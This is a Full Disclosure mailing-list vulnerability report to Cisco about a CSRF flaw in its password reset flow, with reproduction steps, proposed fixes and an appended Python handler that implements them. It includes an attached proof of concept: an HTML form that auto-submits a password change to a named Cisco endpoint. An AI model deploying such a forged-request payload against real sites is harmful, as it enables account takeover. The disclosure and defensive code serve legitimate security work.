Dear Team,

Hope this email finds you well. Please be informed that I found a major security vulnerability in the main Cisco web site https://www.cisco.com/

*Introduction*

The vulnerability allows a remote hacker to force the victim's browser to send a password reset for their account, after which the hacker will be able to take ownership of this account.

----------------------

*Description and Steps To Reproduce the Issue*

1- Go to the main Cisco web site and create a new account.
2- Click on "forgot password" and then enter your email.
3- An email will be sent to your inbox; click the link to reset your password.
4- After capturing the request (attached), I found that it was sent with a session token to open the web page, but with the confirmation (sending email) this session token wasn't sent, plus there is no authorization code or anti-forgery tokens! *This leads to a CSRF vulnerability on the back end side.*
5- By writing a very simple POC script to simulate this request, the hacker will be able to change the password of registered/logged-in victims in the Cisco web application, and by knowing the victim's email he will be able to take over the account easily!

------------------------

*Mitigation*

I'm suggesting the following solution to solve this issue:

1- In the *post* reset password action, the request should contain the session token or authorization code, and the back end side should validate that this session is valid.
2- An anti-forgery token should be added to the request parameters.

-------------------

Attached are screenshots and a simple POC (CISCO_ACCOUNT_OWNERSHIPT_CSRF.html) to demonstrate the issue.

If there is anything not clear, please let me know.

Looking forward to reading from you soon :)

Regards
<!-- POC attached to the report: a cross-site page that auto-submits the
     password reset form. Note that the request carries no session token
     and no anti-forgery token, which is the defect the report describes. -->
<form id="f1" action="https://tools.cisco.com/IDPSWD/passwordResetSubmitAction.do" method="post">
  <input type="hidden" name="user" value="guest"/>
  <input type="hidden" name="pwdForm.newPwd" value="Ahmed_887203243"/>
  <input type="hidden" name="pwdForm.reTypePwd" value="Ahmed_887203243"/>
</form>
<script type="text/javascript">
  document.forms["f1"].submit();
</script>
Attachment: reset_password_1.jpg (JPEG image)
Attachment: reset_password_2.jpg (JPEG image)
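The two mitigations proposed in the report (validate the reset session server-side, and require an anti-forgery token in the POST), as an added defensive example that is not part of the report or of Cisco's code. The in-memory stores, the session cookie name and the `csrf_token` field name are assumptions made for this example; the `pwdForm.*` and `user` field names are those in the attached POC.

```python
import hmac
import secrets
from dataclasses import dataclass

# Constructed in-memory stores standing in for the IDP's session and account
# back end; hypothetical, not Cisco's implementation.
@dataclass
class ResetSession:
    user: str         # account identity bound server-side, never taken from the form
    csrf_token: str   # per-session anti-forgery token echoed back by the reset form

SESSIONS: dict[str, ResetSession] = {}
PASSWORDS: dict[str, str] = {}


def issue_reset_session(user: str) -> tuple[str, str]:
    """Called once the e-mailed reset link has been verified (step 3 of the
    report). Returns the session cookie value and the anti-forgery token that
    the reset page embeds as a hidden form field."""
    session_id = secrets.token_urlsafe(32)
    csrf_token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = ResetSession(user=user, csrf_token=csrf_token)
    return session_id, csrf_token


def password_reset_submit(cookies: dict, form: dict) -> tuple[int, str]:
    """Hardened handler for the kind of POST passwordResetSubmitAction.do accepts.
    The 'csrf_token' field name is an assumption for this example."""
    session_id = cookies.get("session", "")
    session = SESSIONS.get(session_id)
    if session is None:
        # Mitigation 1: a reset POST without a valid reset session is rejected.
        return 401, "no valid reset session"
    # Mitigation 2: the anti-forgery token must be present and match the session.
    # A cross-site form cannot read this token, so a forged POST fails here even
    # when the victim's browser attaches the session cookie automatically.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, session.csrf_token.encode()):
        return 403, "missing or invalid anti-forgery token"
    new_pwd = form.get("pwdForm.newPwd", "")
    if not new_pwd or new_pwd != form.get("pwdForm.reTypePwd"):
        return 400, "passwords missing or do not match"
    # The 'user' form field is ignored; the account comes from the session.
    PASSWORDS[session.user] = new_pwd
    del SESSIONS[session_id]  # one-time use: replaying the same request fails
    return 200, f"password reset for {session.user}"
```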
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/